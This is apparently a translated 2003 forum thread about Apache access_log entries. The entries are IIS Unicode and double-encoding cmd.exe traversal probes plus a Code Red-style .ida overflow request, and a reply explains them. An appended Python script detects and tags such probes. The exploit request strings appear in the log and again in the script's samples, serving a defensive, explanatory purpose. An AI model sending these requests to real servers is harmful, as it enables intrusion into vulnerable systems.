I'm taking advantage of this thread about logs to look at mine. I'm at /var/log/httpd/access_log
I see lots of things like this:
213.119.26.92 - - [21/Sep/2003:21:10:38 +0200] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 401 593 "-" "-"
213.119.26.92 - - [21/Sep/2003:21:10:38 +0200] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 427 "-" "-"
213.119.26.92 - - [21/Sep/2003:21:10:38 +0200] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 401 593 "-" "-"
213.119.26.92 - - [21/Sep/2003:21:10:39 +0200] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 401 593 "-" "-"
213.119.26.92 - - [21/Sep/2003:21:10:39 +0200] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 418 "-" "-"
213.119.26.92 - - [21/Sep/2003:21:10:40 +0200] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 418 "-" "-"
213.119.26.92 - - [21/Sep/2003:21:10:40 +0200] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 401 593 "-" "-"
213.119.26.92 - - [21/Sep/2003:21:10:40 +0200] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 401 593 "-" "-"
68.38.238.151 - - [22/Sep/2003:07:12:35 +0200] "GET /default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a HTTP/1.0" 401 593 "-" "-"
Are these virus attacks against Windows systems?
This really makes me want to change the server's place in the tree of computers!
These are typical attacks used against Krosoft's IIS servers (a Unicode flaw that gives a remote "shell" and, for example, lets one list your C:\).
Of course it is totally ineffective against your Apache ;-)
See you soon
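An added example, not part of the original thread: a small triage script that tags access_log lines like the ones quoted above by the encoding trick they use and reports whether any probe was answered with a 2xx status. The tag names, the 200-byte query threshold and the sample lines (documentation IP addresses, request targets in the style of the log above) are assumptions made for illustration.

```python
import re
from urllib.parse import unquote_to_bytes

# Apache access_log prefix: host, ident, user, [time], "METHOD target PROTO", status
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "\S+ (\S+)[^"]*" (\d{3})')

def classify(target):
    """Return the probe markers present in one raw request target."""
    tags = set()
    once = unquote_to_bytes(target)   # result of a single percent-decode pass
    twice = unquote_to_bytes(once)    # result of a second, mistaken pass
    if twice != once:
        tags.add("double-encoding")
    # Bytes 0xC0 and 0xC1 never occur in valid UTF-8; they only start overlong forms.
    if b"\xc0" in once or b"\xc1" in once:
        tags.add("overlong-utf8")
    if b".." in twice and b"cmd.exe" in twice.lower():
        tags.add("cmd.exe-traversal")
    path, _, query = once.partition(b"?")
    # Assumed threshold: a .ida request with a very long query carrying %u escapes.
    if path.lower().endswith(b".ida") and len(query) > 200 and b"%u" in query:
        tags.add("ida-long-query")
    return tags

def scan(lines):
    """Return (host, status, sorted tags) for every line that carries a marker."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        tags = classify(m.group(2))
        if tags:
            hits.append((m.group(1), int(m.group(3)), sorted(tags)))
    return hits

def answered(hits):
    """Probes answered with 2xx deserve a closer look; 4xx means they were refused."""
    return [h for h in hits if 200 <= h[1] < 300]

# Constructed sample lines (documentation IPs, targets in the style of the log above).
SAMPLE = [
    '192.0.2.10 - - [21/Sep/2003:21:10:38 +0200] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 401 593 "-" "-"',
    '192.0.2.10 - - [21/Sep/2003:21:10:40 +0200] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 401 593 "-" "-"',
    '192.0.2.10 - - [21/Sep/2003:21:10:39 +0200] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 418 "-" "-"',
    '192.0.2.20 - - [22/Sep/2003:07:12:35 +0200] "GET /default.ida?' + "X" * 224 + '%u9090%u6858%ucbd3%u7801=a HTTP/1.0" 401 593 "-" "-"',
    '192.0.2.30 - - [22/Sep/2003:08:00:00 +0200] "GET /index.html HTTP/1.0" 200 1024 "-" "-"',
]

if __name__ == "__main__":
    hits = scan(SAMPLE)
    for hit in hits:
        print(hit)
    print("answered with 2xx:", answered(hits))
```

To run it over a real log, pass `open("/var/log/httpd/access_log", errors="replace")` to `scan()` instead of `SAMPLE`.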
